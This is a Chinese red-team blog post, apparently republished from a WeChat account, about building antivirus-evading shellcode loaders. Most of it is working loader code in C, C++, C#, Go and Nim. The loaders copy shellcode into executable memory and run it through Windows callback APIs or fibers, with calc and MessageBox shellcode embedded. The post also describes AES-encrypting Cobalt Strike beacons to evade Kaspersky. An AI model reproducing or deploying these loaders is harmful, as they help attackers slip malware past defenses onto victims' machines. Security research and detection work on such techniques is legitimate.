红队免杀系列之其一

admin
admin
admin
139219
文章
114
评论
2024年10月7日18:38:42评论12 views字数 11185阅读37分17秒阅读模式

究竟要什么样的结局,才配得上一路的颠沛流离。

01
简介

这张图是国外的某个大佬画的,接下来我们便一个部分一个部分的解读:

红队免杀系列之其一

Shellcode加载器是一种用于执行恶意Shellcode的程序或工具。Shellcode是一小段二进制代码,通常是用汇编语言编写的,用于执行特定的恶意操作,例如破坏计算机系统、获取敏感信息或建立后门访问。Shellcode加载器的主要任务是将Shellcode注入到目标系统的内存中,并执行它,以便实现攻击者的恶意目标。

以下是Shellcode加载器的一般工作流程:

  1. Shellcode准备: 首先,攻击者需要编写或获取用于攻击的Shellcode。这个Shellcode通常是针对特定目标或漏洞的,并且被设计成在目标系统上执行恶意操作。

  2. 加载器注入: 加载器程序负责将Shellcode注入到目标进程的内存空间中。这可以通过多种方式实现,包括使用漏洞利用、钩子技术、远程线程注入等。

  3. 执行Shellcode: 一旦Shellcode被成功注入到目标进程中,加载器会启动目标进程并使其执行Shellcode。Shellcode通常会修改或操纵目标进程的内存、文件系统或网络连接,以实现攻击者的目标。

  4. 潜伏和隐匿: 加载器通常会尽量保持潜伏和隐匿,以避免被检测。这可能涉及到对系统调用的修改、隐藏文件和注册表项的创建、网络通信的加密等技术。

  5. 通信和控制: 一旦Shellcode在目标系统上执行,它可能会与远程控制服务器或恶意命令控制中心通信,以接收进一步的指令或将受害系统的信息传送给攻击者。

Shellcode加载器是一种高级恶意软件工具,通常由专业的黑客或攻击者使用。为了保护计算机系统免受此类攻击,安全团队和防病毒软件开发者会持续更新其工具,以检测并阻止Shellcode加载器的活动。同时,及时的操作系统和应用程序更新也是减轻Shellcode攻击风险的关键因素。

总的说来加载器无外乎三个操作步骤:

1.开辟内存

2.移动shellcode到开辟的内存中

3.执行Shellcode

这里涉及多种语言的Shellcode加载器,文中的Shellcode均以MessageBox或calc的shellcode代替

红队免杀系列之其一

这是一张图,简单总结了常见的shellcode的注入机制。

02
Shellcode加载器模板

多种加载器模板,基本上换汤不换药,由于国内杀毒检测的机制问题,简单更换语言就可以规避一些特征。

下面是五种语言加载器的模板,各有优劣:

1.C/C++语言

   体积适中,第三方库较少,需要自己实现,体积上100KB左右。

2.C#

  更加贴近Windows编程,建议学习,体积上10Kb到50Kb左右。

3.Golang

  对于网络侧通信极其稳定,但是体积较大(相对于C语言10倍左右大小,相对于C#相差几百倍),一般2MB起步。

4.nimlang

  和C语言效率差不多,兼容性不错,目前有成熟的第三方库,体积上80KB到200KB左右。

1)C

代码如下

// Wra7h/FlavorTown
// Written/Compiled: Visual Studio 2022
// Usage: this.exe <shellcode file>
#pragma comment(lib, "Msacm32.lib")

#include <stdio.h>
#include <windows.h>
#include <mmreg.h>
#include <msacm.h>

BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize);

INT wmain(INT argc, WCHAR* argv[])
{
BOOL Ret = FALSE;
DWORD SCLen = 0;
PCHAR Shellcode = NULL;

if (argc != 2)
{
printf("Usage: acmDriverEnum.exe C:\Path\To\Shellcode.bin");
goto CLEANUP;
}

//Read shellcode and setup
Ret = ReadContents(argv[1], &Shellcode, &SCLen);
if (!Ret)
goto CLEANUP;

PVOID hAlloc = VirtualAlloc(NULL, SCLen,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

memcpy(hAlloc, Shellcode, SCLen);

acmDriverEnum((ACMDRIVERENUMCB)hAlloc, 0, 0);

CLEANUP:
if (Shellcode)
free(Shellcode);

return 0;
}

BOOL ReadContents(PWSTR Filepath, PCHAR* Buffer, PDWORD BufferSize)
{
FILE* f = NULL;
_wfopen_s(&f, Filepath, L"rb");
if (f)
{
fseek(f, 0, SEEK_END);
*BufferSize = ftell(f);
fseek(f, 0, SEEK_SET);
*Buffer = malloc(*BufferSize);
fread(*Buffer, *BufferSize, 1, f);
fclose(f);
}

return (*BufferSize != 0) ? TRUE : FALSE;
}

简单理解以上代码:

  1. 使用 #pragma comment(lib, "Msacm32.lib") 将 Msacm32.lib 库链接到程序中。这个库是 Microsoft Audio Compression Manager 的库文件。

  2. 头文件包括 <stdio.h>、<windows.h>、<mmreg.h> 和 <msacm.h>。这些头文件提供了程序所需的标准C库函数、Windows API 函数和音频相关的头文件。

  3. ReadContents 函数用于从指定文件中读取内容。它接受一个文件路径(Filepath)、一个字符指针的指针(Buffer)和一个用于存储内容大小的指针(BufferSize)。函数打开文件,获取文件大小,分配内存来存储文件内容,然后将文件内容读取到分配的内存中。最后返回一个布尔值,指示是否成功读取了文件内容。

  4. wmain 函数是程序的主函数,接收·命令行参数。首先检查是否有正确数量的参数传递给程序,如果参数数量不等于2,则打印用法信息并退出。

  5. 如果参数数量正确,程序会调用 ReadContents 函数来读取指定的Shellcode文件,并将Shellcode存储在内存中。

  6. 然后,程序调用 VirtualAlloc 函数来分配一块内存,大小为Shellcode的长度,并设置内存属性为可读写可执行。接下来,使用 memcpy 函数将读取的Shellcode复制到分配的内存中。

  7. 最后,程序调用 acmDriverEnum 函数,将这块内存当作函数指针进行执行。acmDriverEnum 是一个Windows API函数,通常用于枚举音频驱动程序,实际可以用于执行Shellcode。

  8. CLEANUP 标签是一个清理部分,用于释放在程序执行期间分配的内存。

Vs2022执行编译:

红队免杀系列之其一

注意将库打包到代码中

红队免杀系列之其一

生成完成后,在测试机上运行

红队免杀系列之其一可以看到calc弹窗,证明这个简单的加载器执行了我们的操作。

2)C++

#include <windows.h>
#include <stdio.h>
#include <wincrypt.h>

// Requires Crypt32.lib

// alfarom256 calc shellcode
unsigned char op[] =
"xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50x52"
"x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48"
"x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9"
"x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41"
"x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48"
"x01xd0x8bx80x88x00x00x00x48x85xc0x74x67x48x01"
"xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48"
"xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0"
"xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4c"
"x24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0"
"x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04"
"x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59"
"x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48"
"x8bx12xe9x57xffxffxffx5dx48xbax01x00x00x00x00"
"x00x00x00x48x8dx8dx01x01x00x00x41xbax31x8bx6f"
"x87xffxd5xbbxf0xb5xa2x56x41xbaxa6x95xbdx9dxff"
"xd5x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb"
"x47x13x72x6fx6ax00x59x41x89xdaxffxd5x63x61x6c"
"x63x2ex65x78x65x00";



int main() {


    LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    ::RtlMoveMemory(addr, op, sizeof(op));

    ::CertEnumSystemStore(CERT_SYSTEM_STORE_CURRENT_USER, NULL, NULL, (PFN_CERT_ENUM_SYSTEM_STORE)addr);


}

3)C#

// Wra7h/FlavorTown
// Compile with: Visual Studio 2022 & .NET Fx 3.5+
// Usage: this.exe <shellcode file>

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace acmDriverEnum
{
    internal class Program
    {
        static void Main(string[] args)
        {
            if (args.Length < 1)
            {
                Console.WriteLine("nNo shellcode specified.");
                Console.WriteLine("Example Usage: acmDriverEnum.exe C:\Path\To\Raw\Shellcode.binn");
                System.Environment.Exit(1);
            }

            byte[] payload = System.IO.File.ReadAllBytes(args[0]);

            IntPtr hAlloc = VirtualAlloc(
                            IntPtr.Zero, (uint)payload.Length,
                            0x1000 /*COMMIT*/, 0x40 /*RWX*/);

            Marshal.Copy(payload, 0, hAlloc, payload.Length);

            uint oldProtect;
            VirtualProtectEx(Process.GetCurrentProcess().Handle,
                hAlloc, payload.Length, 0x20/*RX*/, out oldProtect);

            acmDriverEnum(hAlloc, 0, 0);
        }

        [DllImport("kernel32")]
        static extern IntPtr VirtualAlloc(
            IntPtr lpAddress,
            uint dwSize,
            uint flAllocationType,
            uint flProtect);

        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(
            IntPtr hProcess,
            IntPtr lpAddress,
            int dwSize,
            uint flNewProtect,
            out uint lpflOldProtect);

        [DllImport("Msacm32.dll")]
        public extern static void acmDriverEnum(IntPtr CallStateCallback, uint dwInstance, uint fdwEnum);

    }
}

4)Golang

package main

import (
"fmt"
"io/ioutil"
"os"
"syscall"
"unsafe"
)

const (
memCommit  = 0x1000
memReserve = 0x2000
pageRWX    = 0x40
pageRX     = 0x20
)

var (
kernel32        = syscall.NewLazyDLL("kernel32.dll")
virtualAlloc    = kernel32.NewProc("VirtualAlloc")
virtualProtect  = kernel32.NewProc("VirtualProtect")
advapi32        = syscall.NewLazyDLL("Advapi32.dll")
registerWait    = advapi32.NewProc("RegisterWaitChainCOMCallback")
)

func main() {
if len(os.Args) < 2 {
fmt.Println("nNo shellcode specified.")
fmt.Println("Example Usage: RegisterWaitChainCOMCallback.exe C:\Path\To\Raw\Shellcode.binn")
os.Exit(1)
}

payload, err := ioutil.ReadFile(os.Args[1])
if err != nil {
fmt.Printf("Error reading payload file: %vn", err)
os.Exit(1)
}

payloadSize := len(payload)

addr, _, err := virtualAlloc.Call(0, uintptr(payloadSize), memReserve|memCommit, pageRWX)
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Printf("VirtualAlloc failed: %vn", err)
os.Exit(1)
}

copy((*[1 << 30]byte)(unsafe.Pointer(addr))[:payloadSize], payload)

var oldProtect uint32
_, _, err = virtualProtect.Call(addr, uintptr(payloadSize), pageRX, uintptr(unsafe.Pointer(&oldProtect)))
if err != nil && err.Error() != "The operation completed successfully." {
fmt.Printf("VirtualProtect failed: %vn", err)
os.Exit(1)
}

registerWait.Call(uintptr(addr), 0)
}

5)nimlang

#[
    Author: HopScotch, Twitter: @0xHop
    License: BSD 3-Clause
]#

import winim/lean
import osproc


proc RunFiber[I, T](shellcode: array[I, T]): void =
    let MasterFiber = ConvertThreadToFiber(NULL)
    let vAlloc = VirtualAlloc(NULL, cast[SIZE_T](shellcode.len), MEM_COMMIT, PAGE_EXECUTE_READ_WRITE)
    var bytesWritten: SIZE_T
    let pHandle = GetCurrentProcess()
    WriteProcessMemory( pHandle, vAlloc, unsafeaddr shellcode, cast[SIZE_T](shellcode.len), addr bytesWritten)
    let xFiber = CreateFiber(0, cast[LPFIBER_START_ROUTINE](vAlloc), NULL)
    SwitchToFiber(xFiber)



when defined(windows):

    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
    when defined(i386):
        # ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x86 process"
        var shellcode: array[272, byte] = [
        byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
        0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
        0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,
        0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,
        0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,
        0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,
        0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
        0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
        0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,
        0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,
        0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,
        0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
        0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,
        0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,
        0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,
        0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,
        0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24,
        0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,
        0x55,0x08]

    elif defined(amd64):
        # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x64 process"
        var shellcode: array[295, byte] = [
        byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
        0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
        0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
        0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
        0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
        0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
        0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
        0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
        0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
        0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
        0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
        0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
        0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
        0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
        0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
        0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
        0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
        0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
        0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00]

    # This is essentially the equivalent of 'if __name__ == '__main__' in python
    when isMainModule:
        RunFiber(shellcode)

比较推崇Nim,可以兼容低版本的windows,比如下面X86架构的Windows Sever 2003 服务器

nim c -d:mingw --cpu:i386 CBT_Cert_EnumSystemStore.nim

红队免杀系列之其一

执行

红队免杀系列之其一

03

加密改造

因为特定的原因,以CobaltStrike为例,shellcode已经完全被标记,杀软甚至识别到beacon.bin就会报毒,一般而言我们可以选择对shellcode进行高强度加密处理(AES算法等等)

部分代码片段,这里是使用C#编写,简单的实现一个AES加密Shellcode文件,同时可以执行加密的shellcode文件上线,整体代码不超过150行,建议自行实现:

红队免杀系列之其一

成品的展示:

红队免杀系列之其一卡巴斯基扫描:

红队免杀系列之其一webshell上线:

红队免杀系列之其一

04

小结

以上是基础免杀系列的第一篇,聊聊多种语言的加载器,对于代码的解读,以及实现优劣。
     明天七夕了呢,苦逼打工仔...

红队免杀系列之其一

END
红队免杀系列之其一

原文始发于微信公众号(JC的安全之路):红队免杀系列之其一

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日18:38:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队免杀系列之其一https://cn-sec.com/archives/1967264.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息